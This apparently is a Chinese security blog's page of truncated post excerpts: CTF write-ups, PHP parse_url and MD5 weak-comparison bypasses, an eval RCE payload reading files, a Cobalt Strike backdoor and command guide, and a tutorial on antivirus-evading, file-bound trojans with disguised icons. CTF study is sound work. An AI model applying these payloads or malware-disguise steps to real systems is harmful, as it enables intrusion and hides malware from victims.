梦~醒🍇

parse_url函数作用：parse_url — 解析 URL，返回其组成部分 mixed parse_url ( string $url [, int $component = -1 ] )本函数解析一个 URL 并返回一个关联数组，包含在 URL 中出现的各种组成部分。 参数：url：要解析的 URL。无效字符将使用 _ 来替换。 component：指定 PHP_URL_SCHEME、 PHP_URL_HOST、 PHP_URL_PORT、 PHP_URL_USER、 PHP_URL_PASS、 PHP_URL_PATH、PHP_URL_QUERY 或 PHP_URL_FRAGMENT 的其中一个来获取 URL 中指定的部分的 string。 （除了指定为PHP_URL_PORT 后，将返回一个 integer 的值）。 对严重不合格的 URL，parse_url() 可能会返回 FALSE （CTF常用 返回值False 用于逃逸判断） 1234567891011121314151617DEMO<?php$url = 'http://username ...

[TOC] misc签到漫画 每个漫画的最后一张都是二维码的一部分，全部保存，然后拼在一起，扫描二维码出flag.。 flag{youthful_and_upward} whitepic 考点：gif图像 下载文件，没有后缀名，能用010editor打开 根据文件头GIF89a，可以看出是个gif文件。直接使用gifsplitter分离帧数，在其中一帧找到flag 问卷 你懂的 webezGetFlag 考点：http请求方式 点击10次会出现提示 直接抓包，修改请求方式，把GET改成POST就行了。 flag{4efb5300-7885-40a9-bf2a-31bbd8ebef86} ezFindShell 考点：代码审计 这题是赛后复现，所以可能不全 首先拿到一堆php文件，用seay审计 非常相似，当时比赛没找到漏洞，现在复现，全局搜索一下post 发现可用漏洞 array_filter() 函数用回调函数过滤数组中的元素。 该函数把输入数组中的每个键值传给回调函数。如果回调函数返回 true，则把输入数组中的当前键值返回给结 ...

ez_eval123456789 <?phphighlight_file(__FILE__);error_reporting(0);$hubu = $_GET['hubu'];eval($hubu);?> 先进行代码审计，GET传参hubu，并执行命令，没有任何绕过，放开手脚去做 payload: 1?hubu=system('cat /f*'); #直接rce rce_level112345678910 <?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 代码审计，发现过滤了关键字flag, ...

使用大致流程创建团队服务器->客户端连接服务器->创建监听器->生成后门对应监听器->靶机运行后门成功上线->后渗透（提权，内网漫游，域渗透等） 一、安装把全部文件下上传到外网VPS上，并给足权限服务端运行起来 本地电脑使用客户端连接即可主要输入HOST、Port、password即可 二、上线1、设置监听器 2、生成木马后门 运行即可上线CS 3、指令大全 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889browserpivot 注入受害者浏览器进程sleep 3 全部命令3秒执行bypassuac 绕过UACcancel 取消正在进行的下载cd 切换目录checkin 强制让被控端回连一次clear 清除beacon内部的任务队列connect Connect to ...

免杀木马+文件捆绑+权限伪装 文章前言 通过学习使用Cobalt Strike来制作木马，使用摧日对其进行免杀覆盖，使用GoFilebinder对其进行免杀捆绑，最后利用Restorator对其进行图标修改。 环境和软件准备 \1. 一台windows系统的电脑作为攻击机 2.一台靶机 3.Cobalt Strike 4.摧日 5.GoFilebinder 6.Restorator 工具介绍 摧日：一款红队专用免杀木马生成器，基于shellcode生成绕过所有杀软的木马主要支持C语言的shellcode和纯十六进制的shellcodeGoFileBinder：golang免杀捆绑器Restorator：一款修改exe执行程序图标的小工具 正文开始 选用cs中的c格式shellcode，用cs生成一个c语言的相关东西，同时勾选上x64 完成以上步骤后，接下来便开始对其进行免杀操作，用到的工具摧日对其进行免杀处理 使用前请先获取相关工具，并确保已经安装工具所需要的的go环境，至于go环境安装请各位自行查阅本文不在做出相关介绍，安装完毕后进行下一步操作。复制上一步中生成的c文件 ...

记录网站：【CTF_Web：php弱类型绕过与md5碰撞 - CSDN App】http://t.csdnimg.cn/A58wf MD5函数漏洞$str1 = $_GET[‘str1’];$str2 = $_GET[‘str2’];if (md5($str1) == md5($str2)){die(‘OK’); } php弱类型比较产生的漏洞想要满足这个判断只需要构造出MD5值为0e开头的字符串，这样的话弱类型比较会认为是科学技术法，0的多少次方都是0，因此可以绕过MD5 编码后0e开头的字符串：QNKCDZO（0e830400451993494058024219903391）aabg7XSs（0e087386482136013740957780965295）aaabEgHn（0e418636035810609803317995275027）240610708s878926199as155964671as214587387a还有MD5和双MD5以后的值都是0e开头的CbDLytmyGm2xQyaLNhWn770hQgrBOjrcqftrlaZk ...